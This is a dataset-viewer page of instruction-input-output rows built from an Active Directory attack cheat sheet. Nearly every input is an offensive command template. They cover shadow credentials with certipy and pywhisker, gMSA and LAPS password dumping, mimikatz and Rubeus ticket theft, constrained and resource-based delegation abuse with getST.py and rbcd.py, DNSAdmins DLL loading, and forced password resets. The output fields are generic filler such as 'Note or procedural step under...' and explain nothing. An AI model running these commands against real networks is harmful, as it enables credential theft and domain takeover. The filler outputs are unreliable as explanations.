instruction stringclasses 270
values | input stringlengths 3 214 | output stringclasses 297
values |
|---|---|---|
Can change msDS-KeyCredentialLInk (Generic Write) + ADCS | certipy shadow auto '-u <user>@<domain>' -p <password> -account '<target_account>' | Note or procedural step under 'Can change msDS-KeyCredentialLInk (Generic Write) + ADCS'. |
Can change msDS-KeyCredentialLInk (Generic Write) + ADCS | pywhisker.py -d "FQDN_DOMAIN" -u "user1" -p "CERTIFICATE_PASSWORD" --target "TARGET_SAMNAME" --action "list" | Note or procedural step under 'Can change msDS-KeyCredentialLInk (Generic Write) + ADCS'. |
On Group | GenericAll/GenericWrite/Self/Add Extended Rights | Note or procedural step under 'On Group'. |
On Group | Add member to the group | Note or procedural step under 'On Group'. |
On Group | Write Owner | Note or procedural step under 'On Group'. |
On Group | Grant Ownership | Note or procedural step under 'On Group'. |
On Group | WriteDACL + WriteOwner | Note or procedural step under 'On Group'. |
On Group | Grant rights | Note or procedural step under 'On Group'. |
On Group | Give yourself generic all | Note or procedural step under 'On Group'. |
On Computer | GenericAll / GenericWrite | Note or procedural step under 'On Computer'. |
On Computer | msDs-AllowedToActOnBehalf | Note or procedural step under 'On Computer'. |
On Computer | add Key Credentials | Note or procedural step under 'On Computer'. |
On User | GenericAll / GenericWrite | Note or procedural step under 'On User'. |
On User | Change password | Note or procedural step under 'On User'. |
On User | add SPN (target kerberoasting) | Note or procedural step under 'On User'. |
On User | add key credentials | Note or procedural step under 'On User'. |
On User | login script | Note or procedural step under 'On User'. |
On User | ForceChangePassword | Note or procedural step under 'On User'. |
On User | net user <user> <password> /domain | Note or procedural step under 'On User'. |
On OU | Write Dacl | Note or procedural step under 'On OU'. |
On OU | ACE Inheritance | Note or procedural step under 'On OU'. |
On OU | Grant rights | Note or procedural step under 'On OU'. |
On OU | GenericAll / GenericWrite / Manage Group Policy Links | Note or procedural step under 'On OU'. |
On OU | OUned.py --config config.ini | Note or procedural step under 'On OU'. |
ReadGMSAPassword | gMSADumper.py -u '<user>' -p '<password>' -d '<domain>' | Note or procedural step under 'ReadGMSAPassword'. |
ReadGMSAPassword | nxc ldap <ip> -u <user> -p <pass> --gmsa | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
ReadGMSAPassword | ldeep ldap -u <user> -p <password> -d <domain> -s ldaps://<dc_ip> gmsa | Note or procedural step under 'ReadGMSAPassword'. |
Get LAPS passwords | Who can read LAPS | Note or procedural step under 'Get LAPS passwords'. |
Get LAPS passwords | MATCH p=(g:Base)-[:ReadLAPSPassword]->(c:Computer) RETURN p | Note or procedural step under 'Get LAPS passwords'. |
Get LAPS passwords | Read LAPS | Note or procedural step under 'Get LAPS passwords'. |
Get LAPS passwords | Get-LapsADPassword -DomainController <ip_dc> -Credential <domain>\<login> | Format-Table -AutoSize | Note or procedural step under 'Get LAPS passwords'. |
Get LAPS passwords | ldeep ldap -u <user> -p <password> -d <domain> -s ldap://<dc_ip> laps | Note or procedural step under 'Get LAPS passwords'. |
Get LAPS passwords | foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}} | Note or procedural step under 'Get LAPS passwords'. |
Get LAPS passwords | nxc ldap <dc_ip> -d <domain> -u <user> -p <password> --module laps | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Get LAPS passwords | msf> use post/windows/gather/credentials/enum_laps | Tool or command referenced under 'Get LAPS passwords'. |
GPO | Who can control GPOs | Note or procedural step under 'GPO'. |
GPO | MATCH p=((n:Base)-[]->(gp:GPO)) RETURN p | Note or procedural step under 'GPO'. |
GPO | SID of principals that can create new GPOs in the domain | Note or procedural step under 'GPO'. |
GPO | Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=blah,DC=com" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" } | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl | Note or procedural step under 'GPO'. |
GPO | Return the principals that can write to the GP-Link attribute on OUs | Note or procedural step under 'GPO'. |
GPO | Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN, SecurityIdentifier | fl | Note or procedural step under 'GPO'. |
GPO | Generic Write on GPO | Note or procedural step under 'GPO'. |
GPO | Abuse GPO | Note or procedural step under 'GPO'. |
DNS Admin | DNSadmins abuse (CVE-2021-40469) | Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
DNS Admin | dnscmd.exe /config /serverlevelplugindll <\\path\to\dll> # need a dnsadmin user | Note or procedural step under 'DNS Admin'. |
DNS Admin | sc \\DNSServer stop dns sc \\DNSServer start dns | Note or procedural step under 'DNS Admin'. |
Find delegation | findDelegation.py "<domain>"/"<user>":"<password>" | Note or procedural step under 'Find delegation'. |
Find delegation | With BloodHound | Note or procedural step under 'Find delegation'. |
Find delegation | Unconstrained | Note or procedural step under 'Find delegation'. |
Find delegation | MATCH (c:Computer {unconstraineddelegation:true}) RETURN c | Note or procedural step under 'Find delegation'. |
Find delegation | MATCH (c:User {unconstraineddelegation:true}) RETURN c | Note or procedural step under 'Find delegation'. |
Find delegation | Constrained | Note or procedural step under 'Find delegation'. |
Find delegation | MATCH p=((c:Base)-[:AllowedToDelegate]->(t:Computer)) RETURN p | Note or procedural step under 'Find delegation'. |
Find delegation | MATCH p=shortestPath((u:User)-[*1..]->(c:Computer {name: "<MYTARGET.FQDN>"})) RETURN p | Note or procedural step under 'Find delegation'. |
Unconstrained delegation | UAC: ADS_UF_TRUSTED_FOR_DELEGATION | Note or procedural step under 'Unconstrained delegation'. |
Unconstrained delegation | Force connection with coerce | Note or procedural step under 'Unconstrained delegation'. |
Unconstrained delegation | Get tickets | Note or procedural step under 'Unconstrained delegation'. |
Unconstrained delegation | mimikatz privilege::debug sekurlsa::tickets /export sekurlsa::tickets /export | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Unconstrained delegation | Rubeus.exe dump /service:krbtgt /nowrap | Tool or command referenced under 'Unconstrained delegation'. |
Unconstrained delegation | Rubeus.exe dump /luid:0xdeadbeef /nowrap | Tool or command referenced under 'Unconstrained delegation'. |
Unconstrained delegation | Rubeus.exe monitor /interval:5 | Tool or command referenced under 'Unconstrained delegation'. |
Constrained delegation | With protocol transition (any) UAC: TRUST_TO_AUTH_FOR_DELEGATION | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | Get TGT for user | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | Request S4u2self | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | Request S4u2proxy | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | Rubeus.exe hash /password:<password> | Tool or command referenced under 'Constrained delegation'. |
Constrained delegation | Rubeus.exe asktgt /user:<user> /domain:<domain> /aes256:<AES 256 hash> | Tool or command referenced under 'Constrained delegation'. |
Constrained delegation | Rubeus.exe s4u /ticket:<ticket> /impersonateuser:<admin_user> /msdsspn:<spn_constrained> /altservice:<altservice> /ptt | Tool or command referenced under 'Constrained delegation'. |
Constrained delegation | Altservice HTTP/HOST/CIFS/LDAP | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | getST.py -spn '<spn>/<target>' -impersonate Administrator -dc-ip '<dc_ip>' '<domain>/<user>:<password>' -altservice <altservice> | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | Altservice HTTP/HOST/CIFS/LDAP | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | Without protocol transition (kerberos only) UAC: TRUSTED_FOR_DELEGATION | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | Constrain between Y and Z | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | Add computer X | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | Add RBCD : delegate from X to Y | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | s4u2self X (impersonate admin) | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | S4u2Proxy X (impersonate admin on spn/Y) | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | Forwardable TGS for Y | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | S4u2Proxy Y (impersonate admin on spn/Z) | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | add computer account | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | addcomputer.py -computer-name '<computer_name>' -computer-pass '<ComputerPassword>' -dc-host <dc> -domain-netbios <domain_netbios> '<domain>/<user>:<password>' | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | RBCD With added computer account | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | rbcd.py -delegate-from '<rbcd_con>$' -delegate-to '<constrained>$' -dc-ip '<dc>' -action 'write' -hashes '<hash>' <domain>/<constrained>$ | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | getST.py -spn host/<constrained> -impersonate Administrator --dc-ip <dc_ip> '<domain>/<rbcd_con>$:<rbcd_conpass>' | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | getST.py -spn <constrained_spn>/<target> -hashes '<hash>' '<domain>/<constrained>$' -impersonate Administrator --dc-ip <dc_ip> -additional-ticket <previous_ticket> | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | Self RBCD | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | Like RBCD without add computer | Note or procedural step under 'Constrained delegation'. |
Resource-Based Constrained Delegation | add computer account | Note or procedural step under 'Resource-Based Constrained Delegation'. |
Resource-Based Constrained Delegation | addcomputer.py -computer-name '<computer_name>' -computer-pass '<ComputerPassword>' -dc-host <dc> -domain-netbios <domain_netbios> '<domain>/<user>:<password>' | Note or procedural step under 'Resource-Based Constrained Delegation'. |
Resource-Based Constrained Delegation | RBCD With added computer account | Note or procedural step under 'Resource-Based Constrained Delegation'. |
Resource-Based Constrained Delegation | Rubeus.exe hash /password:<computer_pass> /user:<computer> /domain:<domain> | Tool or command referenced under 'Resource-Based Constrained Delegation'. |
Resource-Based Constrained Delegation | Rubeus.exe s4u /user:<fake_computer$> /aes256:<AES 256 hash> /impersonateuser:administrator /msdsspn:cifs/<victim.domain.local> /altservice:krbtgt,cifs,host,http,winrm,RPCSS,wsman,ldap /domain:domain.local /ptt | Tool or command referenced under 'Resource-Based Constrained Delegation'. |
Resource-Based Constrained Delegation | rbcd.py -delegate-from '<computer>$' -delegate-to '<target>$' -dc-ip '<dc>' -action 'write' <domain>/<user>:<password> | Note or procedural step under 'Resource-Based Constrained Delegation'. |
Resource-Based Constrained Delegation | getST.py -spn host/<dc_fqdn> '<domain>/<computer_account>:<computer_pass>' -impersonate Administrator --dc-ip <dc_ip> #Kerberos TGT | Note or procedural step under 'Resource-Based Constrained Delegation'. |
S4U2self abuse | Get machine account (X)'s TGT | Note or procedural step under 'S4U2self abuse'. |
S4U2self abuse | Get a ST on X as user admin | Note or procedural step under 'S4U2self abuse'. |
S4U2self abuse | getTGT.py -dc-ip "<dc_ip>" -hashes :"<machine_hash>" "<domain>"/"<machine>$" | Note or procedural step under 'S4U2self abuse'. |
S4U2self abuse | getST.py -self -impersonate "<admin>" -altservice "cifs/<machine>" -k -no-pass -dc-ip "DomainController" "<domain>"/'<machine>$' #Admin | Note or procedural step under 'S4U2self abuse'. |
Enumeration | certutil -v -dsTemplate | Note or procedural step under 'Enumeration'. |
Enumeration | certify.exe find [ /vulnerable] | Note or procedural step under 'Enumeration'. |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.